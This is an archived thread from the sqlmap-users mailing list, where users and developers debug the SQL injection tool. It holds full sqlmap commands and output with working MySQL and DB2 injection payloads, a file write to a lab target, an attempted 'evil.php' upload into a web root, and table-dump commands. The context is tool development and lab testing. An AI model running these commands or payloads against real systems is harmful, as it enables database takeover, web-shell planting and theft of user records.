> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085"
> --file-wr
> ite "evil.php" --file-dest "temp/evil.php"
>
> This is with the latest dev build by the way.
>
> The output I get is:
>
> [18:00:03] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: MySQL 5.0
> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
> [18:00:03] [INFO] the back-end DBMS operating system is Windows
> [18:00:04] [WARNING] if the problem persists with 'None' values please try
> to us
> e hidden switch --no-cast (fixing problems with some collation issues)
> do you want confirmation that the file 'temp/evil.php' has been successfully
> wri
> tten on the back-end DBMS file system? [Y/n]
> [18:00:12] [WARNING] it looks like the file has not been written, this can
> occur
> if the DBMS process' user has no write privileges in the destination path
> [18:00:12] [WARNING] expect junk characters inside the file as a leftover
> from U
> NION query
> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
> Files\sqlm
> ap-0.9\output\localhost'
>
> [*] shutting down at 18:00:12
>
> and sure enough the file isn't written. I've also tried using the --no-cast
> switch, to no avail.
>
> Does anyone have any ideas on what could be going wrong here? I can use the
> --file-read switch to read any file such as C:\boot.ini. The --os-cmd and
> --os-pwn commands also fail at the stager upload phase, probably for similar
> reasons.
>
> Any help would be appreciated
>
> Cheers
>
> Chris
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2d-c2
>_______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-06 22:42:32
|
Hi Chris,
To me it works well:
--8<--
$ python sqlmap.py -u
"http://debian32/mutillidae/index.php?page=user-info.php" --forms -p
view_user_name --risk 3 --level 3 --parse-errors --file-write
/etc/passwd --file-dest /tmp/test --flush-session
sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program
[*] starting at 23:26:35
[23:26:35] [INFO] setting file for logging HTTP traffic
[23:26:35] [INFO] testing connection to the target url
[23:26:35] [INFO] heuristics detected web page charset 'ascii'
[23:26:35] [INFO] searching for forms
[#1] form:
POST http://debian32:80/mutillidae/index.php?page=user-info.php
POST data: view_user_name=&password=&Submit_button=Submit
do you want to test this form? [Y/n/q]
>
Edit POST data [default:
view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
detected):
do you want to fill blank fields with random values? [Y/n]
[23:26:37] [WARNING] the testable parameter 'view_user_name' you
provided is not inside the GET
[23:26:37] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
as session file
[23:26:37] [INFO] flushing session file
[23:26:37] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
as results file
[23:26:37] [INFO] heuristics detected web page charset 'ascii'
[23:26:37] [INFO] testing if the url is stable, wait a few seconds
[23:26:38] [INFO] url is stable
[23:26:38] [INFO] heuristic test shows that POST parameter
'view_user_name' might be injectable (possible DBMS: MySQL)
[23:26:38] [INFO] testing sql injection on POST parameter 'view_user_name'
[23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
clause (Generic comment)'
[23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
blind - WHERE or HAVING clause (Generic comment)' injectable
[23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
error-based - WHERE or HAVING clause' injectable
[23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:26:43] [INFO] target url appears to be UNION injectable with 4 columns
[23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
query (NULL) - 1 to 10 columns' injectable
[23:26:43] [WARNING] in OR boolean-based injections, please consider
usage of switch --drop-set-cookie if you experience any problems
during data retrieval
POST parameter 'view_user_name' is vulnerable. Do you want to keep
testing the others? [y/N]
sqlmap identified the following injection points with a total of 148
HTTP(s) requests:
---
Place: POST
Parameter: view_user_name
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: view_user_name=-5244' OR NOT (1884=1884)--
&password=bDXj&Submit_button=Submit
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: view_user_name=-3024' OR 1 GROUP BY
CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
&password=bDXj&Submit_button=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: view_user_name=IZBb' UNION ALL SELECT NULL,
CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84)
AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL,
NULL#&password=bDXj&Submit_button=Submit
---
do you want to exploit this SQL injection? [Y/n]
[23:26:46] [INFO] testing MySQL
[23:26:46] [INFO] confirming MySQL
[23:26:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[23:26:46] [INFO] fingerprinting the back-end DBMS operating system
[23:26:46] [INFO] the back-end DBMS operating system is Linux
[23:26:46] [WARNING] if the problem persists with 'None' values please
try to use hidden switch --no-cast (fixing problems with some
collation issues)
do you want confirmation that the file '/tmp/test' has been
successfully written on the back-end DBMS file system? [Y/n]
[23:26:48] [INFO] the file has been successfully written and its size
is 1848 bytes, but the size differs from the local file '/etc/passwd'
(1845 bytes)
[23:26:48] [WARNING] expect junk characters inside the file as a
leftover from UNION query
[23:26:48] [INFO] you can find results of scanning in multiple targets
mode inside the CSV file
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
[*] shutting down at 23:26:48
--8<--
Cheers,
Bernardo
On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote:
> Hi
>
> I'm playing with file writing. I have a full privs root user set up in
> mysql and am using
> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
> to play with. I've set up a /temp folder below the web root of the app.
> I've put a file "evil.php" in the sqlmap working directory. I've also
> changed the permissions for all users on the temp folder to write access
> allowed.
>
> I'm using the following input to try and upload this file:
>
> C:\Program Files\sqlmap-0.9>python sqlmap.py -u
> "http://localhost/mutillidae/ind
> ex.php?page=user-info.php" --data
> "username=&password=&user-info-php-submit-butt
> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085"
> --file-wr
> ite "evil.php" --file-dest "temp/evil.php"
>
> This is with the latest dev build by the way.
>
> The output I get is:
>
> [18:00:03] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: MySQL 5.0
> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
> [18:00:03] [INFO] the back-end DBMS operating system is Windows
> [18:00:04] [WARNING] if the problem persists with 'None' values please try
> to us
> e hidden switch --no-cast (fixing problems with some collation issues)
> do you want confirmation that the file 'temp/evil.php' has been successfully
> wri
> tten on the back-end DBMS file system? [Y/n]
> [18:00:12] [WARNING] it looks like the file has not been written, this can
> occur
> if the DBMS process' user has no write privileges in the destination path
> [18:00:12] [WARNING] expect junk characters inside the file as a leftover
> from U
> NION query
> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
> Files\sqlm
> ap-0.9\output\localhost'
>
> [*] shutting down at 18:00:12
>
> and sure enough the file isn't written. I've also tried using the --no-cast
> switch, to no avail.
>
> Does anyone have any ideas on what could be going wrong here? I can use the
> --file-read switch to read any file such as C:\boot.ini. The --os-cmd and
> --os-pwn commands also fail at the stager upload phase, probably for similar
> reasons.
>
> Any help would be appreciated
>
> Cheers
>
> Chris
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2d-c2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-06 21:15:29
|
Hi, Update on IBM DB2 support: payload for time-based has been added[1] last week as well as support for direct connection (-d switch). [1] https://twitter.com/#!/sqlmap/status/85659702565937152 On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi, > > The long awaited IBM DB2 support has been implemented in sqlmap. The > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH > and merged in sqlmap repository after some tweaking by us. It is very > stable for both DB2 8.x and 9.x branches. > The patch includes support to fingerprint and enumerate data on IBM > DB2 via boolean-based blind SQL injection and UNION query SQL > injection. Hopefully, soon someone will come up with a payload for > time-based and error-based techniques too. Support for direct > connection to the DBMS (-d switch) will be implemented soon as well. > > Thank you Sebastian and the rest of the team at r-tec for your patch > and support! > > Sample run against an IBM DB2 9.7 test environment: > --8<-- > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user > > sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [!] legal disclaimer: usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility > to obey all applicable local, state and federal laws. Authors assume > no liability and are not responsible for any misuse or damage caused > by this program > > [*] starting at 10:56:21 > > [10:56:21] [INFO] using > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' > as session file > [10:56:21] [INFO] testing connection to the target url > [10:56:23] [INFO] heuristics detected web page charset 'ascii' > [10:56:23] [INFO] testing if the url is stable, wait a few seconds > [10:56:25] [INFO] url is stable > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic > [10:56:26] [INFO] GET parameter 'id' is dynamic > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might > be injectable (possible DBMS: DB2) > [10:56:27] [INFO] testing sql injection on GET parameter 'id' > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - > WHERE or HAVING clause' injectable > parsed error message(s) showed that the back-end DBMS could be DB2. Do > you want to skip test payloads specific for other DBMSes? [Y/n] > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - > 1 to 10 columns' injectable > GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] > sqlmap identified the following injection points with a total of 21 > HTTP(s) requests: > --- > Place: GET > Parameter: id > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh > > Type: UNION query > Title: Generic UNION query (NULL) - 1 to 10 columns > Payload: id=1' UNION ALL SELECT > CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) > FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM > --- > > [10:58:58] [INFO] testing IBM DB2 > [10:58:59] [INFO] confirming IBM DB2 > [10:59:12] [INFO] the back-end DBMS is IBM DB2 > web server operating system: Windows > web application technology: PHP 5.3.5, Apache 2.2.17 > back-end DBMS: active fingerprint: IBM DB2 9.7 > html error message fingerprint: DB2 > [10:59:12] [INFO] fetching banner > banner: 'DB2 v9.7.400.501' > > [10:59:13] [INFO] fetching current user > current user: 'TEST' > --8<-- > > Bernardo > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Stiefenhofer, M. <M.S...@r-...> - 2011-07-05 22:08:53
|
Hi all, Miroslav posted some news about an ongoing SQLi ModSecurity challenge. I was curious and had a quick look at it. One of the vulnerable applications has an MS Access DB and can be UNION based injected. Unfortunately UNION based tests against MS Access will always fail with sqlmap, because for UNION based injections the defined comment string (queries.xml) is not respected. Access needs %00 as comment string and even this is not working in many cases. One quick fix would be adding special Access UNION test definitions to payload.xml like it has been done for MySQL. Another problem is the defined SELECT_FROM for MS Access dbms, it's MSysObjects. In the ModSecurity challenge this system table has no read permissions hence any UNION test must fail. But the system table MSysAccessXML has read permissions in this specific case. Does anyone know, which of the two tables is more likely to have read access in the wild? Does it make sense to change SELECT_FROM? Is MSysAccessXML present in older MS Access versions? Hope some Access expert may help. -marek |
|
From: Chris O. <chr...@gm...> - 2011-07-03 17:03:17
|
Hi I'm playing with file writing. I have a full privs root user set up in mysql and am using http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10to play with. I've set up a /temp folder below the web root of the app. I've put a file "evil.php" in the sqlmap working directory. I've also changed the permissions for all users on the temp folder to write access allowed. I'm using the following input to try and upload this file: C:\Program Files\sqlmap-0.9>python sqlmap.py -u " http://localhost/mutillidae/ind ex.php?page=user-info.php" --data "username=&password=&user-info-php-submit-butt on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" --file-wr ite "evil.php" --file-dest "temp/evil.php" This is with the latest dev build by the way. The output I get is: [18:00:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0 [18:00:03] [INFO] fingerprinting the back-end DBMS operating system [18:00:03] [INFO] the back-end DBMS operating system is Windows [18:00:04] [WARNING] if the problem persists with 'None' values please try to us e hidden switch --no-cast (fixing problems with some collation issues) do you want confirmation that the file 'temp/evil.php' has been successfully wri tten on the back-end DBMS file system? [Y/n] [18:00:12] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path [18:00:12] [WARNING] expect junk characters inside the file as a leftover from U NION query [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlm ap-0.9\output\localhost' [*] shutting down at 18:00:12 and sure enough the file isn't written. I've also tried using the --no-cast switch, to no avail. Does anyone have any ideas on what could be going wrong here? I can use the --file-read switch to read any file such as C:\boot.ini. The --os-cmd and --os-pwn commands also fail at the stager upload phase, probably for similar reasons. Any help would be appreciated Cheers Chris |
|
From: Miroslav S. <mir...@gm...> - 2011-07-02 22:46:58
|
hi nightman. thank you for your report and find it fixed in the latest commit. kr On Fri, Jul 1, 2011 at 4:51 PM, <nig...@em...> wrote: > Hi, > > I have again a Problem with Dump. I run a Blind sql injection with revision 4208. I let sqlmap dumping the data from the DB and interrupt the dumping but the fetched data was only in the session file but not in a csv file. Sqlmap create the csv file only when it finished the dumping. > > greetz nightman > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-07-02 22:45:42
|
hi Phat. thank you for your report and find it patched in the latest commit. there should now be a warning for this kind of situations (if no more threads are allowed then declared). kr On Sat, Jul 2, 2011 at 5:46 PM, Phat R. <pha...@gm...> wrote: > Dear SQLMap developer > > I found the bug from SQLMap from 2 URLs in my company that are shown below > > > > > ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ > --=== RESULT FROM SERVER A to URL A ===-- > > [00:05:04] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4203), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > > sqlmap version: 1.0-dev (r4203) > Python version: 2.6.6 > Operating system: posix > Command line: ./sqlmap.py -u > **************************************************** --threads=10 --dump -C > *********************** -T tb_register -D ****** -v 1 --random-agent > Technique: BOOLEAN > Back-end DBMS: Microsoft SQL Server (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/home/tum/sqlmap-dev/lib/controller/controller.py", line 551, in > start > action() > File "/home/tum/sqlmap-dev/lib/controller/action.py", line 109, in action > conf.dbmsHandler.dumpTable() > File "/home/tum/sqlmap-dev/plugins/generic/enumeration.py", line 1695, in > dumpTable > retVal = self.__pivotDumpTable(table, colList, count, blind=True) > File "/home/tum/sqlmap-dev/plugins/generic/enumeration.py", line 1450, in > __pivotDumpTable > value = inject.getValue(query, inband=False, error=False) > File "/home/tum/sqlmap-dev/lib/request/inject.py", line 456, in getValue > value = __goInferenceProxy(query, fromUser, expected, batch, > resumeValue, unpack, charsetType, firstChar, lastChar, dump) > File "/home/tum/sqlmap-dev/lib/request/inject.py", line 321, in > __goInferenceProxy > outputs = __goInferenceFields(expression, expressionFields, > expressionFieldsList, payload, expected, resumeValue=resumeValue, > charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) > File "/home/tum/sqlmap-dev/lib/request/inject.py", line 102, in > __goInferenceFields > output = __goInference(payload, expressionReplaced, charsetType, > firstChar, lastChar, dump) > File "/home/tum/sqlmap-dev/lib/request/inject.py", line 66, in > __goInference > count, value = bisection(payload, expression, length, charsetType, > firstChar, lastChar, dump) > File "/home/tum/sqlmap-dev/lib/techniques/blind/inference.py", line 423, > in bisection > thread.start() > File "/usr/lib/python2.6/threading.py", line 474, in start > _start_new_thread(self.__bootstrap, ()) > error: can't start new thread > > [*] shutting down at 00:05:04 > > > ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ > --=== RESULT FROM SERVER B to URL B ===-- > > [19:32:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4182), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > > sqlmap version: 1.0-dev (r4182) > Python version: 2.5.2 > Operating system: posix > Command line: ./sqlmap.py -u > http://www.mysite.com/index.php?page=data&cmd=play&id=879 --dump -C > username,telephone,email -T member -D webdev -v 1 --user-agent=IE 7.0 > --threads=15 > Technique: BOOLEAN > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/home/tum/SQL/sqlmap-dev/lib/controller/controller.py", line 551, in > start > action() > File "/home/tum/SQL/sqlmap-dev/lib/controller/action.py", line 109, in > action > conf.dbmsHandler.dumpTable() > File "/home/tum/SQL/sqlmap-dev/plugins/generic/enumeration.py", line 1723, > in dumpTable > value = inject.getValue(query, inband=False, error=False, dump=True) > File "/home/tum/SQL/sqlmap-dev/lib/request/inject.py", line 456, in > getValue > value = __goInferenceProxy(query, fromUser, expected, batch, > resumeValue, unpack, charsetType, firstChar, lastChar, dump) > File "/home/tum/SQL/sqlmap-dev/lib/request/inject.py", line 321, in > __goInferenceProxy > outputs = __goInferenceFields(expression, expressionFields, > expressionFieldsList, payload, expected, resumeValue=resumeValue, > charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) > File "/home/tum/SQL/sqlmap-dev/lib/request/inject.py", line 102, in > __goInferenceFields > output = __goInference(payload, expressionReplaced, charsetType, > firstChar, lastChar, dump) > File "/home/tum/SQL/sqlmap-dev/lib/request/inject.py", line 66, in > __goInference > count, value = bisection(payload, expression, length, charsetType, > firstChar, lastChar, dump) > File "/home/tum/SQL/sqlmap-dev/lib/techniques/blind/inference.py", line > 423, in bisection > thread.start() > File "/usr/lib/python2.5/threading.py", line 440, in start > _start_new_thread(self.__bootstrap, ()) > error: can't start new thread > > [*] shutting down at 19:32:57 > > > ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ > Please see an attachment file for theserver specification that run the > sqlmap program > > > -- > - Phatthanaphol R. - > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Phat R. <pha...@gm...> - 2011-07-02 15:46:14
|
-= CPU SPECIFICATION =-
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping : 7
cpu MHz : 2327.587
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 0
cpu cores : 4
apicid : 0
initial apicid : 0
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc a
rch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
bogomips : 4658.87
clflush size : 64
power management:
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping : 7
cpu MHz : 2327.587
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 1
cpu cores : 4
apicid : 1
initial apicid : 1
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc a
rch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
bogomips : 4655.01
clflush size : 64
power management:
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping : 7
cpu MHz : 2327.587
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 2
cpu cores : 4
apicid : 2
initial apicid : 2
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc a
rch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
bogomips : 4655.03
clflush size : 64
power management:
processor : 3
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping : 7
cpu MHz : 2327.587
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 3
cpu cores : 4
apicid : 3
initial apicid : 3
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc a
rch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
bogomips : 4655.04
clflush size : 64
power management:
processor : 4
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping : 7
cpu MHz : 2327.587
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 0
cpu cores : 4
apicid : 4
initial apicid : 4
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc a
rch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
bogomips : 4655.06
clflush size : 64
power management:
processor : 5
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping : 7
cpu MHz : 2327.587
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 1
cpu cores : 4
apicid : 5
initial apicid : 5
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc a
rch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
bogomips : 4655.05
clflush size : 64
power management:
processor : 6
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping : 7
cpu MHz : 2327.587
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 2
cpu cores : 4
apicid : 6
initial apicid : 6
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc a
rch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
bogomips : 4655.06
clflush size : 64
power management:
processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping : 7
cpu MHz : 2327.587
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 3
cpu cores : 4
apicid : 7
initial apicid : 7
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc a
rch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
bogomips : 4655.06
clflush size : 64
power management:
------------------------------------------------------------------------------------------------------------------------------------------
-= MEMORY =-
total used free shared buffers cached
Mem: 4148348 3988128 160220 0 176036 3595248
-/+ buffers/cache: 216844 3931504
Swap: 3903752 14836 3888916
|
|
From: <nig...@em...> - 2011-07-01 14:51:49
|
Hi, I have again a Problem with Dump. I run a Blind sql injection with revision 4208. I let sqlmap dumping the data from the DB and interrupt the dumping but the fetched data was only in the session file but not in a csv file. Sqlmap create the csv file only when it finished the dumping. greetz nightman |
|
From: Miroslav S. <mir...@gm...> - 2011-06-29 17:47:16
|
